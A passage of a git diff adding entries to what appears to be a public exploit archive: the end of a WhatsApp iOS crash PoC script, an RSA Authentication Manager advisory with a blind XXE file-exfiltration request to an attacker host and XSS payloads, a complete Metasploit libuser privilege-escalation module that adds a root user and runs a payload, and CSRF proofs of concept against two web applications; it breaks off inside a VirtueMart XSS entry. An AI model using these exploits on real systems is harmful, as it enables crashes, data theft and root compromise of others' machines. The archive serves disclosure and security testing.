⩉⩊⩋⩌⩍⩎⩏⩐⩑⩒⩓⩔⩕⩖⩗⩘⩙⩚⩛⩜⩝⩞⩟⩠⩡⩢⩣⩤⩥⩦⩧⩨⩩⩪⩫⩬⩭⩮⩯⩰⩱⩲⩳⩴⩵⩶⩷⩸⩹⩺⩻⩼⩽⩾⩿⪀⪁⪂⪃⪄⪅⪆⪇⪈⪉⪊⪋⪌⪍⪎⪏⪐⪑⪒⪓⪔⪕⪖⪗⪘⪙⪚⪛⪜⪝⪞⪟⪠⪡⪢⪣⪤⪥⪦⪧⪨⪩⪪⪫⪬⪭⪮⪯⪰⪱⪲⪳⪴⪵⪶⪷⪸⪹⪺⪻⪼⪽⪾⪿⫀⫁⫂⫃⫄⫅⫆⫇⫈⫉⫊⫋⫌⫍⫎⫏⫐⫑⫒⫓⫔⫕⫖⫗⫘⫙⫚⫛⫝̸⫝⫞⫟⫠⫡⫢⫣⫤⫥⫦⫧⫨⫩⫪⫫⫬⫭⫮⫯⫰⫱⫲⫳⫴⫵⫶⫷⫸⫹⫺⫻⫼⫽⫾⫿⬀⬁⬂⬃⬄⬅⬆⬇⬈⬉⬊⬋⬌⬍⬎⬏⬐⬑⬒⬓⬔⬕⬖⬗⬘⬙⬚⬛⬜⬝⬞⬟⬠⬡⬢⬣⬤⬥⬦⬧⬨⬩⬪⬫⬬⬭⬮⬯⬰⬱⬲⬳⬴⬵⬶⬷⬸⬹⬺⬻⬼⬽⬾⬿⭀⭁⭂⭃⭄⭅⭆⭇⭈⭉⭊⭋⭌⭍⭎⭏⭐⭑⭒⭓⭔⭕⭖⭗⭘⭙⭚⭛⭜⭝⭞⭟⭠⭡⭢⭣⭤⭥⭦⭧⭨⭩⭪⭫⭬⭭⭮⭯⭰⭱⭲⭳⭶⭷⭸⭹⭺⭻⭼⭽⭾⭿⮀⮁⮂⮃⮄⮅⮆⮇⮈⮉⮊⮋⮌⮍⮎⮏⮐⮑⮒⮓⮔⮕⮘⮙⮚⮛⮜⮝⮞⮟⮠⮡⮢⮣⮤⮥⮦⮧⮨⮩⮪⮫⮬⮭⮮⮯⮰⮱⮲⮳⮴⮵⮶⮷⮸⮹⮽⮾⮿⯀⯁⯂⯃⯄⯅⯆⯇⯈⯊⯋⯌⯍⯎⯏⯐⯑⯒⯬⯭⯮⯯ⰀⰁⰂⰃⰄⰅⰆⰇⰈⰉⰊⰋⰌⰍⰎⰏⰐⰑⰒⰓⰔⰕⰖⰗⰘⰙⰚⰛⰜⰝⰞⰟⰠⰡⰢⰣⰤⰥⰦⰧⰨⰩⰪⰫⰬⰭⰮⰰⰱⰲⰳⰴⰵⰶⰷⰸⰹⰺⰻⰼⰽⰾⰿⱀⱁⱂⱃⱄⱅⱆⱇⱈⱉⱊⱋⱌⱍⱎⱏⱐⱑⱒⱓⱔⱕⱖⱗⱘⱙⱚⱛⱜⱝⱞⱠⱡⱢⱣⱤⱥⱦⱧⱨⱩⱪⱫⱬⱭⱮⱯⱰⱱⱲⱳⱴⱵⱶⱷⱸⱹⱺ⡈⡉⡊⡋⡌⡍⡎⡏⡐⡑⡒⡓⡔⡕⡖⡗⡘⡙⡚⡛⡜⡝⡞⡟⡠⡡⡢⡣⡤⡥⡦⡧⡨⡩⡪⡫⡬⡭⡮⡯⡰⡱⡲⡳⡴⡵⡶⡷⡸⡹⡺⡻⡼⡽⡾⡿⢀⢁⢂⢃⢄⢅⢆⢇⢈⢉⢊⢋⢌⢍⢎⢏⢐⢑⢒⢓⢔⢕⢖⢗⢘⢙⢚⢛⢜⢝⢞⢟⢠⢡⢢⢣⢤⢥⢦⢧⢨⢩⢪⢫⢬⢭⢮⢯⢰⢱⢲⢳⢴⢵⢶⢷⢸⢹⢺⢻⢼⢽⢾⢿⣀⣁⣂⣃⣄⣅⣆⣇⣈⣉⣊⣋⣌⣍⣎⣏⣐⣑⣒⣓⣔⣕⣖⣗⣘⣙⣚⣛⣜⣝⣞⣟⣠⣡⣢⣣⣤⣥⣦⣧⣨⣩⣪⣫⣬⣭⣮⣯⣰⣱⣲⣳⣴⣵⣶⣷⣸⣹⣺⣻⣼⣽⣾⣿⤀⤁⤂⤃⤄⤅⤆⤇⤈⤉⤊⤋⤌⤍⤎⤏⤐⤑⤒⤓⤔⤕⤖⤗⤘⤙⤚⤛⤜⤝⤞⤟⤠⤡⤢⤣⤤⤥⤦⤧⤨⤩⤪⤫⤬⤭⤮⤯⤰⤱⤲⤳⤴⤵⤶⤷⤸⤹⤺⤻⤼⤽⤾⤿⥀⥁⥂⥃⥄⥅⥆⥇⥈⥉⥊⥋⥌⥍⥎⥏⥐⥑⥒⥓⥔⥕⥖⥗⥘⥙⥚⥛⥜⥝⥞⥟⥠⥡⥢⥣⥤⥥⥦⥧⥨⥩⥪⥫⥬⥭⥮⥯⥰⥱⥲⥳⥴⥵⥶⥷⥸⥹⥺⥻⥼⥽⥾⥿⦀⦁⦂⦃⦄⦅⦆⦇⦈⦉⦊⦋⦌⦍⦎⦏⦐⦑⦒⦓⦔⦕⦖⦗⦘⦙⦚⦛⦜⦝⦞⦟⦠⦡⦢⦣⦤⦥⦦⦧⦨⦩⦪⦫⦬⦭⦮⦯⦰⦱⦲⦳⦴⦵⦶⦷⦸⦹⦺⦻⦼⦽⦾⦿⧀⧁⧂⧃⧄⧅⧆⧇⧈⧉⧊⧋⧌⧍⧎⧏⧐⧑⧒⧓⧔⧕⧖⧗⧘⧙⧚⧛⧜⧝⧞⧟⧠⧡⧢⧣⧤⧥⧦⧧⧨⧩⧪⧫⧬⧭⧮⧯⧰⧱⧲⧳⧴⧵⧶⧷⧸⧹⧺⧻⧼⧽⧾⧿⨀⨁⨂⨃⨄⨅⨆⨇⨈⨉⨊⨋⨌⨍⨎⨏⨐⨑⨒⨓⨔⨕⨖⨗⨘⨙⨚⨛⨜⨝⨞⨟⨠⨡⨢⨣⨤⨥⨦⨧⨨⨩⨪⨫⨬⨭⨮⨯⨰⨱⨲⨳⨴⨵⨶⨷⨸⨹⨺⨻⨼⨽⨾⨿⩀⩁⩂⩃⩄⩅⩆⩇⩈⩉⩊⩋⩌⩍⩎⩏⩐⩑⩒⩓⩔⩕⩖⩗⩘⩙⩚⩛⩜⩝⩞⩟⩠⩡⩢⩣⩤⩥⩦⩧⩨⩩⩪⩫⩬⩭⩮⩯⩰⩱⩲⩳⩴⩵⩶⩷⩸⩹⩺⩻⩼⩽⩾⩿⪀⪁⪂⪃⪄⪅⪆⪇⪈⪉⪊⪋⪌⪍⪎⪏⪐⪑⪒⪓⪔⪕⪖⪗⪘⪙⪚⪛⪜⪝⪞⪟⪠⪡⪢⪣⪤⪥⪦⪧⪨⪩⪪⪫⪬⪭⪮⪯⪰⪱⪲⪳⪴⪵⪶⪷⪸⪹⪺⪻⪼⪽⪾⪿⫀⫁⫂⫃⫄⫅⫆⫇⫈⫉⫊⫋⫌⫍⫎⫏⫐⫑⫒⫓⫔⫕⫖⫗⫘⫙⫚⫛⫝̸⫝⫞⫟⫠⫡⫢⫣⫤⫥⫦⫧⫨⫩⫪⫫⫬⫭⫮⫯⫰⫱⫲⫳⫴⫵⫶⫷⫸⫹⫺⫻⫼⫽⫾⫿⬀⬁⬂⬃⬄⬅⬆⬇⬈⬉⬊⬋⬌⬍⬎⬏⬐⬑⬒⬓⬔⬕⬖⬗⬘⬙⬚⬛⬜⬝⬞⬟⬠⬡⬢⬣⬤⬥⬦⬧⬨⬩⬪⬫⬬⬭⬮⬯⬰⬱⬲⬳⬴⬵⬶⬷⬸⬹⬺⬻⬼⬽⬾⬿⭀⭁⭂⭃⭄⭅⭆⭇⭈⭉⭊⭋⭌⭍⭎⭏⭐⭑⭒⭓⭔⭕⭖⭗⭘⭙⭚⭛⭜⭝⭞⭟⭠⭡⭢⭣⭤⭥⭦⭧⭨⭩⭪⭫⭬⭭⭮⭯⭰⭱⭲⭳⭶⭷⭸⭹⭺⭻⭼⭽⭾⭿⮀⮁⮂⮃⮄⮅⮆⮇⮈⮉⮊⮋⮌⮍⮎⮏⮐⮑⮒⮓⮔⮕⮘⮙⮚⮛⮜⮝⮞⮟⮠⮡⮢⮣⮤⮥⮦⮧⮨⮩⮪⮫⮬⮭⮮⮯⮰⮱⮲⮳⮴⮵⮶⮷⮸⮹⮽⮾⮿⯀⯁⯂⯃⯄⯅⯆⯇⯈⯊⯋⯌⯍⯎⯏⯐⯑⯒⯬⯭⯮⯯ⰀⰁⰂⰃⰄⰅⰆⰇⰈⰉⰊⰋⰌⰍⰎⰏⰐⰑⰒⰓⰔⰕⰖⰗⰘⰙⰚⰛⰜⰝⰞⰟⰠⰡⰢⰣⰤⰥⰦⰧⰨⰩⰪⰫⰬⰭⰮⰰⰱⰲⰳⰴⰵⰶⰷⰸⰹⰺⰻⰼⰽⰾⰿⱀⱁⱂⱃⱄⱅⱆⱇⱈⱉⱊⱋⱌⱍⱎⱏⱐⱑⱒⱓⱔⱕⱖⱗⱘⱙⱚⱛⱜⱝⱞⱠⱡⱢⱣⱤⱥⱦⱧⱨⱩⱪⱫⱬⱭⱮⱯⱰⱱⱲⱳⱴⱵⱶⱷⱸⱹⱺ'
+    sutf8 = payload.encode('UTF-8')
+    finalPoC = payload*6
+    print "[*] Writing to file: " + filename
+    open(filename, 'w').write("\n".join(payload))
+    print "[*] Done."
+
+def howtouse():
+    print "Usage: whatsapp.py [FILENAME]"
+    print "[*] Mandatory arguments:"
+    print "[-] FILENAME"
+    sys.exit(-1)
+
+if __name__ == "__main__":
+    try:
+        print "[*] WhatsApp 2.18.31 iOS - Remote memory corruption"
+        print "[*] Author: jsacco@exploitpack.com - http://exploitpack.com"
+        print "[*] How to use: Copy the content of the file and send
+it as a message to another whatsapp user or group"
+        whatsapp(sys.argv[1])
+    except IndexError:
+        howtouse()
\ No newline at end of file
diff --git a/exploits/java/webapps/44634.txt b/exploits/java/webapps/44634.txt
new file mode 100644
index 000000000..81a9a59ef
--- /dev/null
+++ b/exploits/java/webapps/44634.txt
@@ -0,0 +1,254 @@
+SEC Consult Vulnerability Lab Security Advisory < 20180516-0 >
+=======================================================================
+              title: XXE & XSS vulnerabilities
+            product: RSA Authentication Manager
+ vulnerable version: 8.2.1.4.0-build1394922, < 8.3 P1
+      fixed version: 8.3 P1 and later
+         CVE number: CVE-2018-1247
+             impact: High
+           homepage: https://www.rsa.com
+              found: 2017-11-16
+                 by: Mantas Juskauskas (Office Vilnius)
+                     SEC Consult Vulnerability Lab
+
+                     An integrated part of SEC Consult
+                     Europe | Asia | North America
+
+                     https://www.sec-consult.com
+
+=======================================================================
+
+Vendor description:
+-------------------
+"RSA provides more than 30,000 customers around the world with the essential
+security capabilities to protect their most valuable assets from cyber
+threats. With RSA's award-winning products, organizations effectively detect,
+investigate, and respond to advanced attacks; confirm and manage identities;
+and ultimately, reduce IP theft, fraud, and cybercrime."
+
+Source: https://www.rsa.com/en-us/company/about
+
+
+Business recommendation:
+------------------------
+By exploiting the vulnerabilities documented in this advisory an attacker can
+obtain sensitive information from the RSA Authentication Manager file system,
+initiate arbitrary TCP connections or cause DoS. In addition to this, clients
+of the RSA Authentication manager can be affected by exploiting client-side
+issues.
+
+SEC Consult recommends to apply the available patches from the vendor.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1) XML External Entity Injection (XXE) (CVE-2018-1247)
+The used XML parser is resolving XML external entities which allows an
+authenticated attacker (or an attacker that is able to trick an authenticated
+user into importing malicious XML files) to read files, send requests to
+systems on the internal network (e.g port scanning) or cause a DoS (e.g.
+billion laughs attack).
+This issue has been fixed by RSA as described in the advisory DSA-2018-086.
+(http://seclists.org/fulldisclosure/2018/May/18)
+
+
+2) Cross-site Flashing
+The vulnerable flash file does not filter or escape the user input
+sufficiently. This leads to a reflected cross-site scripting vulnerability.
+With reflected cross-site scripting, an attacker can inject arbitrary HTML or
+JavaScript code into the victim's web browser. Once the victim clicks a
+malicious link the attacker's code is executed in the context of the victim's
+web browser.
+
+The vulnerability exists in a third party component called pmfso.
+This issue has been fixed by RSA as described in the advisory DSA-2018-082.
+
+
+3) DOM based Cross-site Scripting
+Several client-side scripts handle user supplied data with insufficient
+validation before storing it in the DOM. This issue can be exploited to cause
+reflected cross-site scripting.
+
+The identified issues exist in third party components. One of the affected
+components is PopCalendarX which has an assigned CVE (CVE-2017-9072).
+This issue has been fixed by RSA as described in the advisory DSA-2018-082.
+
+Two further issues affecting other third party components are not yet fixed,
+as the third party vendor did not supply a patch to RSA yet.
+
+
+Proof of concept:
+-----------------
+1) XML External Entity Injection (XXE) (CVE-2018-1247)
+
+The Security Console of the RSA Authentication Manager allows authenticated
+users to import SecurID Token jobs in XML format. By importing an XML file
+with malicious XML code to the application, it is possible to exploit a blind
+XXE vulnerability within the application.
+
+For example, in order to read arbitrary files from the RSA Authentication
+Manager OS, the following malicious XML file can be imported via the affected
+endpoint:
+==========================================================================================
+POST /console-ims/ImportTokenJob.do?ptoken=[snip] HTTP/1.1
+Host: <host>:7004
+Cookie: [snip]
+
+[snip]
+
+-----------------------------9721941626073
+Content-Disposition: form-data; name="textImportFileName.theFile";
+filename="xxe_test.xml"
+Content-Type: text/xml
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo SYSTEM "http://<attacker>/a.dtd">
+<key>
+&e1;
+</key>
+-----------------------------9721941626073
+Content-Disposition: form-data; name="textImportFileName.uploadResult"
+
+[snip]
+
+==========================================================================================
+
+In this case, the attacker has to host the defined a.dtd file in the web root
+of a controlled web server:
+==========================================================================================
+# cat /var/www/a.dtd
+<!ENTITY % p1 SYSTEM "file:///etc/issue">
+<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://<attacker>:8080/%p1;'>">
+%p2;
+==========================================================================================
+
+Assuming that the RSA Authentication Manager OS has network level access to
+the TCP port 80 and 8080 of the attacker controlled IP address, as soon as the
+malicious XML file gets uploaded and parsed, the contents of the /etc/issue
+file (as an example) are leaked to a remote listener controlled by the attacker:
+==========================================================================================
+# nc -nlvp 8080
+listening on [any] 8080 ...
+connect to [<attacker>] from (UNKNOWN) [<host>] 32817
+GET /RSA%20Authentication%20Manager%208.2.1.4.0-build1394922 HTTP/1.1
+==========================================================================================
+
+Similarly, contents of other internal files can be obtained from the affected
+system with current service user permissions.
+
+
+2) Cross-site Flashing
+The issue affects a third party component pmfso (DSA-2018-082).
+To exploit a reflected cross-site scripting via the vulnerable SWF Flash file
+it is sufficient to click the following URL:
+
+https://<host>:7004//IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert("Cross-site_Scripting")//
+
+
+3) DOM based Cross-site Scripting
+
+Example 1:
+The issue affects a third party component PopCalendarX (CVE-2017-9072).
+To exploit DOM based reflected cross-site scripting it is enough to trick a
+victim into executing the following JavaScript (e.g. by clicking on a
+specially crafted link):
+==========================================================================================
+<script>
+window.name = "gToday:#' onload='alert(document.domain)' ";
+location.href = "https://<host>:7004/IMS-AA-IDP/common/scripts/calendar/ipopeng.htm";
+</script>
+
+==========================================================================================
+
+Example 2:
+Proof of concept has been removed. The issue affects another third party
+component. The fix has not been issued by the third party vendor so far.
+
+Example 3:
+Proof of concept has been removed. The issue affects another third party
+component. The fix has not been issued by the third party vendor so far.
+
+
+Vulnerable / tested versions:
+-----------------------------
+The identified vulnerabilities have been verified to exist in the
+RSA Authentication Manager, version 8.2.1.4.0-build1394922 which was the latest
+version available during the test.
+
+
+Vendor contact timeline:
+------------------------
+2017-11-23: Contacting vendor through security_alert@emc.com
+2017-11-24: Vendor confirms the information was received, forwards it
+            to the responsible team for investigation and assigns tickets.
+2017-12-08: Vendor acknowledges all reported issues as valid. Remediation
+            plan is being determined.
+2018-01-04: Contacting vendor for a status update.
+2018-01-04: Vendor provides a possible fix date.
+2018-02-21: Vendor provides a status update regarding the fix release date.
+2018-04-24: Vendor contacts for credit text approval.
+2018-05-08: Contacting vendor for the reason of uncoordinated public
+            release and status information
+2018-05-08: Vendor provides an update regarding their public release and
+            status of vulnerabilities not included in the release, vendor info:
+            * DSA-2018-086 (http://seclists.org/fulldisclosure/2018/May/18)
+              was released on 5/4
+            * DSA-2018-082 (https://community.rsa.com/docs/DOC-92083)
+              was released on 5/3
+2018-05-16: Security advisory release
+
+
+Solution:
+---------
+The vendor has released an advisory that contains recommendations of how to
+resolve the reported XML External Entity Injection Vulnerability:
+DSA-2018-086 - https://community.rsa.com/docs/DOC-92085 - (RSA Link Sign On Required)
+
+Full Disclosure archive:
+http://seclists.org/fulldisclosure/2018/May/18
+
+Note: the suggested resolution also provides a fix for the Cross-site Flashing
+and DOM based Cross-site Scripting (only Example 1) issues provided in the
+descriptions above.
+
+
+Workaround:
+-----------
+None
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Europe | Asia | North America
+
+About SEC Consult Vulnerability Lab
+The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
+ensures the continued knowledge gain of SEC Consult in the field of network
+and application security to stay ahead of the attacker. The SEC Consult
+Vulnerability Lab supports high-quality penetration testing and the evaluation
+of new offensive and defensive technologies for our customers. Hence our
+customers obtain the most current information about vulnerabilities and valid
+recommendation about the risk profile of new technologies.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Interested to work with the experts of SEC Consult?
+Send us your application https://www.sec-consult.com/en/career/index.html
+
+Interested in improving your cyber security with the experts of SEC Consult?
+Contact our local offices https://www.sec-consult.com/en/contact/index.html
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+EOF M. Juskauskas / @2018
\ No newline at end of file
diff --git a/exploits/linux/local/44633.rb b/exploits/linux/local/44633.rb
new file mode 100755
index 000000000..5e3548f55
--- /dev/null
+++ b/exploits/linux/local/44633.rb
@@ -0,0 +1,275 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GreatRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Libuser roothelper Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges on Red Hat based Linux
+        systems, including RHEL, Fedora and CentOS, by exploiting a newline
+        injection vulnerability in libuser and userhelper versions prior to
+        0.56.13-8 and version 0.60 before 0.60-7.
+
+        This module makes use of the roothelper.c exploit from Qualys to
+        insert a new user with UID=0 in /etc/passwd.
+
+        Note, the password for the current user is required by userhelper.
+
+        Note, on some systems, such as Fedora 11, the user entry for the
+        current user in /etc/passwd will become corrupted and exploitation
+        will fail.
+
+        This module has been tested successfully on libuser packaged versions
+        0.56.13-4.el6 on CentOS 6.0 (x86_64);
+        0.56.13-5.el6 on CentOS 6.5 (x86_64);
+        0.60-5.el7 on CentOS 7.1-1503 (x86_64);
+        0.56.16-1.fc13 on Fedora 13 (i686);
+        0.59-1.fc19 on Fedora Desktop 19 (x86_64);
+        0.60-3.fc20 on Fedora Desktop 20 (x86_64);
+        0.60-6.fc21 on Fedora Desktop 21 (x86_64);
+        0.60-6.fc22 on Fedora Desktop 22 (x86_64);
+        0.56.13-5.el6 on Red Hat 6.6 (x86_64); and
+        0.60-5.el7 on Red Hat 7.0 (x86_64).
+
+        RHEL 5 is vulnerable, however the installed version of glibc (2.5)
+        is missing various functions required by roothelper.c.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Qualys',       # Discovery and C exploit
+          'Brendan Coles' # Metasploit
+        ],
+      'DisclosureDate' => 'Jul 24 2015',
+      'Platform'       => [ 'linux' ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Targets'        => [[ 'Auto', {} ]],
+      'Privileged'     => true,
+      'References'     =>
+        [
+          [ 'AKA', 'roothelper.c' ],
+          [ 'EDB', '37706' ],
+          [ 'CVE', '2015-3245' ],
+          [ 'CVE', '2015-3246' ],
+          [ 'BID', '76021' ],
+          [ 'BID', '76022' ],
+          [ 'URL', 'http://seclists.org/oss-sec/2015/q3/185' ],
+          [ 'URL', 'https://access.redhat.com/articles/1537873' ]
+        ],
+      'DefaultTarget'  => 0))
+    register_options [
+      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
+      OptString.new('PASSWORD', [ true, 'Password for the current user', '' ]),
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def password
+    datastore['PASSWORD'].to_s
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    cmd_exec "chmod +x '#{path}'"
+  end
+
+  def live_compile?
+    compile = false
+
+    if datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
+      if has_gcc?
+        vprint_good 'gcc is installed'
+        compile = true
+      else
+        unless datastore['COMPILE'].eql? 'Auto'
+          fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
+        end
+      end
+    end
+
+    compile
+  end
+
+  def check
+    userhelper_path = '/usr/sbin/userhelper'
+    unless setuid? userhelper_path
+      vprint_error "#{userhelper_path} is not setuid"
+      return CheckCode::Safe
+    end
+    vprint_good "#{userhelper_path} is setuid"
+
+    unless command_exists? 'script'
+      vprint_error "script is not installed. Exploitation will fail."
+      return CheckCode::Safe
+    end
+    vprint_good 'script is installed'
+
+    if cmd_exec('lsattr /etc/passwd').include? 'i'
+      vprint_error 'File /etc/passwd is immutable'
+      return CheckCode::Safe
+    end
+    vprint_good 'File /etc/passwd is not immutable'
+
+    glibc_banner = cmd_exec 'ldd --version'
+    glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
+    if glibc_version.to_s.eql? ''
+      vprint_error 'Could not determine the GNU C library version'
+      return CheckCode::Detected
+    end
+
+    # roothelper.c requires functions only available since glibc 2.6+
+    if glibc_version < Gem::Version.new('2.6')
+      vprint_error "GNU C Library version #{glibc_version} is not supported"
+      return CheckCode::Safe
+    end
+    vprint_good "GNU C Library version #{glibc_version} is supported"
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    if check == CheckCode::Safe
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
+    executable_path = "#{base_dir}/#{executable_name}"
+
+    if live_compile?
+      vprint_status 'Live compiling exploit on system...'
+
+      # Upload Qualys' roothelper.c exploit:
+      # - https://www.exploit-db.com/exploits/37706/
+      path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper.c'
+      fd = ::File.open path, 'rb'
+      c_code = fd.read fd.stat.size
+      fd.close
+      upload "#{executable_path}.c", c_code
+      output = cmd_exec "gcc -o #{executable_path} #{executable_path}.c"
+
+      unless output.blank?
+        print_error output
+        fail_with Failure::Unknown, "#{executable_path}.c failed to compile"
+      end
+
+      cmd_exec "chmod +x #{executable_path}"
+      register_file_for_cleanup executable_path
+    else
+      vprint_status 'Dropping pre-compiled exploit on system...'
+
+      # Cross-compiled with:
+      # - i486-linux-musl-gcc -o roothelper -static -pie roothelper.c
+      path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper'
+      fd = ::File.open path, 'rb'
+      executable_data = fd.read fd.stat.size
+      fd.close
+      upload_and_chmodx executable_path, executable_data
+    end
+
+    # Run roothelper
+    timeout = 180
+    print_status "Launching roothelper exploit (Timeout: #{timeout})..."
+    output = cmd_exec "echo #{password.gsub(/'/, "\\\\'")} | #{executable_path}", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+
+    if output =~ %r{Creating a backup copy of "/etc/passwd" named "(.*)"}
+      register_file_for_cleanup $1
+    end
+
+    if output =~ /died in parent: .*.c:517: forkstop_userhelper/
+      fail_with Failure::NoAccess, 'Incorrect password'
+    end
+
+    @username = nil
+
+    if output =~ /Exploit successful, run "su ([a-z])" to become root/
+      @username = $1
+    end
+
+    if @username.blank?
+      fail_with Failure::Unknown, 'Something went wrong'
+    end
+
+    print_good "Success! User '#{@username}' added to /etc/passwd"
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    # Execute payload executable
+    vprint_status 'Executing payload...'
+    cmd_exec "script -c \"su - #{@username} -c #{payload_path}\" | sh & echo "
+    register_file_for_cleanup 'typescript'
+  end
+
+  #
+  # Remove new user from /etc/passwd
+  #
+  def on_new_session(session)
+    new_user_removed = false
+
+    if session.type.to_s.eql? 'meterpreter'
+      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+
+      # Remove new user
+      session.sys.process.execute '/bin/sh', "-c \"sed -i 's/^#{@username}:.*$//g' /etc/passwd\""
+
+      # Wait for clean up
+      Rex.sleep 5
+
+      # Check for new user in /etc/passwd
+      passwd_contents = session.fs.file.open('/etc/passwd').read.to_s
+      unless passwd_contents =~ /^#{@username}:/
+        new_user_removed = true
+      end
+    elsif session.type.to_s.eql? 'shell'
+      # Remove new user
+      session.shell_command_token "sed -i 's/^#{@username}:.*$//g' /etc/passwd"
+
+      # Check for new user in /etc/passwd
+      passwd_user = session.shell_command_token "grep '#{@username}:' /etc/passwd"
+      unless passwd_user =~ /^#{@username}:/
+        new_user_removed = true
+      end
+    end
+
+    unless new_user_removed
+      print_warning "Could not remove user '#{@username}' from /etc/passwd"
+    end
+  rescue => e
+    print_error "Error during cleanup: #{e.message}"
+  ensure
+    super
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/webapps/44628.txt b/exploits/linux/webapps/44628.txt
new file mode 100644
index 000000000..28a684a5d
--- /dev/null
+++ b/exploits/linux/webapps/44628.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Horse Market Sell & Rent Portal Script 1.5.7  - Cross-Site Request Forgery
+# Date: 2018-05-15
+# Exploit Author: L0RD
+# Vendor Homepage: https://codecanyon.net/item/horse-market-sell-rent-portal/14174352?s_rank=1725
+# CVE: N/A
+# Version: 1.5.7
+# Tested on: Kali linux
+
+# Details:
+# Horse Market Sell & Rent Portal Script has CSRF vulnerability which attacker can change user information.
+
+# Exploit :
+<html>
+<head>
+<title>CSRF POC</title>
+</head>
+  <body>
+    <form action="http://geniuscript.com/horse-script/index.php/frontend/myprofile/en" method="POST">
+      <input type="hidden" name="name&#95;surname" value="D3C0DE" />
+      <input type="hidden" name="username" value="L0RD" />
+      <input type="hidden" name="password" value="anything" />
+      <input type="hidden" name="password&#95;confirm" value="anything" />
+      <input type="hidden" name="address" value="Cyro&#32;trento&#32;23" />
+      <input type="hidden" name="description" value="My&#32;description&#32;2" />
+      <input type="hidden" name="phone" value="&#43;10101010" />
+      <input type="hidden" name="mail" value="lord&#64;gmail&#46;com" />
+    </form>
+  <script>
+      document.forms[0].submit();
+  </script>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/44624.txt b/exploits/php/webapps/44624.txt
new file mode 100644
index 000000000..364f152b5
--- /dev/null
+++ b/exploits/php/webapps/44624.txt
@@ -0,0 +1,20 @@
+# Exploit Title: MyBB Admin Notes Plugin - CSRF
+# Date: 2018-05-14
+# Author: 0xB9
+# Contact: luxorforums.com/User-0xB9 or 0xB9[at]pm.me
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=1106
+# Version: 1.1
+# Tested on: Ubuntu 18.04
+
+# 1. Description: The plugin allows administrators to save notes and display them in a list in the ACP. The CSRF allows an attacker to remotely delete all admin notes.
+
+# 2. Proof of Concept:
+<html>
+	<body>
+		<img style="display:none" src="http://localhost/mybb/admin/index.php?empty=table" alt="">
+	</body>
+</html>
+
+# 3. Solution:
+# Update to the latest release
+# Patch: https://github.com/vintagedaddyo/MyBB_Plugin-adminnotes/commit/3deae701cdd89753cb6688302aee5b93a72bc58b?diff=split
\ No newline at end of file
diff --git a/exploits/php/webapps/44625.txt b/exploits/php/webapps/44625.txt
new file mode 100644
index 000000000..dce0182d9
--- /dev/null
+++ b/exploits/php/webapps/44625.txt
@@ -0,0 +1,15 @@
+# Exploit Title: VirtueMart 3.1.14 - Persistent Cross-Site Scripting
+# Date: 2018-02-25
+# Software Link: http://virtuemart.net/
+# Exploit Author: Mattia Furlani
+# CVE: CVE-2018-7465
+# Category: webapps
+
+# 1. Description
+# An XSS issue was discovered in VirtueMart before 3.2.14. All the textareas in the admin area of the plugin can be closed by simply adding </textarea> to the value and saving the product/config. By editing back the product/config, the editor's browser will execute everything after the </textarea>, leading to a possible XSS.
+
+# 2. Proof of Concept
